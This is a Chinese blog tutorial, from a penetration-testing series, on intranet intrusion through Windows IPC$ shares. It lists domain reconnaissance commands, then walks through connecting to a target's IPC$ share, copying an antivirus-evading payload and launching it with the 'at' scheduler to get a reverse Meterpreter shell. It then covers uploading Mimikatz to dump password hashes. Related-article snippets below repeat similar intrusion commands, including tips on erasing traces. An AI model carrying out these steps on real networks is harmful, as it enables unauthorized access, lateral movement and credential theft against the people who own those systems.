渗透之——内网IPC$入侵

最新推荐文章于 2024-04-10 13:56:34 发布
最新推荐文章于 2024-04-10 13:56:34 发布
阅读量2.5k 收藏 15
点赞数 2
分类专栏: 精通渗透系列 文章标签: 渗透 IPC$入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/85995503
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85995503

一、域操作相关的命令

1.查看域用户

net user/domain

2.查看有几个域

net view/domain

3.查看域内的主机

net view/domain: XXX

4.查看域里面的组

net group/domain

5.查看域内所有的主机名

net group "domain computers" /domain

6.查看域管理员

net group "domain admins" /domain

7.查看域控制器

net group "domain controllers" /domain

8.查看企业管理组

net group "enterprise admins" /domain

9.查看时间服务器

nettime/domain

二、IPC$入侵

IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见。
假设现在有一台IPC$主机:127.0.0.25,输入以下命令。

#连接127.0.0.25的IPC$共享:
D:>net use \127.0.0.25\ipc$
#复制srv.exe到目标主机
D:>copy srv.exe \127.0.0.25\ipc$ 
#查时间
D:>net time\127.0.0.25
#用at命令在10点50分启动srv.exe(注意这里设置的时间比主机时间快)
D:>at \127.0.0.25 10:50 srv.exe

上述命令中的at就是让计算机在指定的时间做指定事情的命令(例如运行程序)

这里把免杀的Payload上传到PAVMSEP131服务器,然后利用at命令启动Payload,反弹回Meterpreter Shell
将木马复制到目标服务器

查看系统时间

使用at命令启动木马

接着返回handler监听,可以看到反弹成功了,我们获得了PAVMSEP131服务器的Meterpreter Shell
反弹成功

下面看看PAVMSEP131服务器的信息和现在的权限
查看系统信息

可以看到有SYSTEM权限,说明既可以使用Mimikatz等工具,也可以输入 run post/windows/gather/hashdump来抓Hash
在用Mimikatz抓Hash前要注意一点:如果服务器安装的是64位操作系统,要把Mimikatz的进程迁移到一个64位的程序进程中,才能查看64位操作系统的密码明文,在32位系统中就没有这个限制。

这里使用Mimikatz抓Hash

上传Mimikatz

抓取Hash

查看抓到的域用户的权限

 

 

冰 河
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 -r包括子目录 -m 设置压缩比         -m0 存储 添加到压缩文件时不压缩文件。         -m1 最快 使用最快方式(低压缩)         -m2 较快 使用快速压缩方式         -m3 标准 使用标准(默认)压缩方式         -m4 较好 使用较好压缩方式(较好压缩,但是慢)         -m5 最好 使用最
IPC$入侵的4种方式
weixin_43456810的博客
12-31 1961
IPC$入侵的4种方式 1. 建立空连接 net use \\192.168.1.111\IPC$ 只要在建立空连接的命令最后添加del,即删除IPC$空连接的命令 2. 查看远程主机的当前时间 net time \\192.168.1.111 3. 查看远程主机的共享资源 net view \\192.168.1.111 4. 得到远程主机的NetBIOS的用户名列表 nbtstat -a 192.168.1.111 禁止IPC$共享 services.msc–>Server–>启动
Windows系统常用DOS命令_系统远程登录的dos命令,2024年最新网络安全组件化架构实践
最新发布
2401_84185145的博客
04-10 276
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
IPC$入侵完全指令
yutel的专栏
06-25 1万+
一   相关命令  1)建立空连接:  net use \\IP\ipc$ "" /user:""         (一定要注意:这一行命令中包含了3个空格)  2)建立非空连接:  net use \\IP\ipc$ "用户名" /user:"密码"      (同样有3个空格)  3)映射默认共享:  net use z: \\IP\c$ "密码" /user:"用户名"    
ipc连接常见问题
清流弯弯
07-06 1万+
<br /><br /> <br />1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?<br /> <br />答:留下记录是一定的,你走后用程序删除就可以了,或者用肉鸡入侵。<br /><br />2.你看下面的情况是为什么,可以连接但不能复制 <br /><br />net use //***.***.***.***/ipc$ "密码" /user:"用户名" <br />命令成功 <br />copy icmd.exe //***.***.***.***/admin$
Windows局渗透IPC$管道)
huanongying131的博客
08-12 6846
转:http://www.360doc.com/content/15/0504/05/13092497_467784134.shtml 黑客技术——ipc$命令所使用的端口 首先我们来了解一些基础知识: 1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务; 2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(...
windows IPC$ 入侵
热门推荐
正在成为 code ape
01-26 2万+
IPC$简介 IPC$ (Internet Process Connection)国人叫他共享"命名管道"资源服务。 其实看原始英文名称我们能更好的理解他的用途和作用。 IPC$就是为“进程”间建立网络连接而存在的服务 说的再明确点就是:IPC$是一个为“各类进程”建立网络通信连接而存在的服务 ipc利用 1.windows server 2003 与 windows xp ipc连接无需密码即可...
渗透——内网转发之利用ftp实现文件传输
01-09
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于...
电脑教程内网渗透内网穿透.rar
10-25
电脑教程内网渗透内网穿透
内网渗透渗透.pdf
08-07
目录 工作组& 渗透姿势 MS14-068 致谢
我所了解的内网渗透——内网渗透知识大总结 作者:未知.pdf
04-08
我所了解的内网渗透——内网渗透知识大总结 作者:未知
一份详尽的IPC$入侵资料
07-06
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!
IPC$入侵攻略
河北正定欢迎您-少占鱼
10-23 1110
一份详尽的IPC$入侵资料利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认
4. 内网渗透IPC$入侵
weixin_30394669的博客
02-08 857
IPC$连接 IPC$的概念: IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 IPC$的作用: 利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列...
Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
LKmnbZ's Blog
01-14 6621
一、经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32...
IPC$入侵
weixin_30377461的博客
09-19 751
一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管...
IPC$局入侵详解
帅帅的小窝
02-26 1万+
PC$命令详解  网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些容易混淆
ipc$入侵
11-17 179
而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。  我们只需要在isql窗口中输入:use mastersp_dropextended...
防范IPC$远程入侵常用方法
06-08
IPC$是Windows系统中的一个共享资源,它允许用户在网络上访问远程计算机的资源。然而,攻击者也可以利用IPC$来进行远程入侵,进而获取目标计算机的控制权。以下是一些防范IPC$远程入侵的常用方法: 1. 禁用IPC$共享:在目标计算机上禁用IPC$共享,可以有效避免IPC$远程入侵。具体方法是,在目标计算机上打开“计算机管理”窗口,然后找到“共享文件夹”选项,将IPC$共享禁用即可。 2. 开启防火墙:在目标计算机上开启防火墙,可以有效防止未经授权的远程访问。具体方法是,在目标计算机上打开“控制面板”窗口,找到“Windows防火墙”选项,然后开启防火墙并设置相关规则,如禁止来自特定IP地址的访问等。 3. 更新系统补丁:及时更新系统补丁可以修复系统漏洞,避免被黑客攻击。建议用户定期检查并更新系统补丁。 4. 使用安全软件:安装并使用安全软件,如杀毒软件、防火墙等,可以有效保护计算机的安全。同时,还可以定期进行病毒扫描、木马查杀等操作。 5. 加强密码安全:设置强密码可以防止黑客猜测密码进行入侵。建议用户设置复杂密码,并定期更换密码,避免密码泄露。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值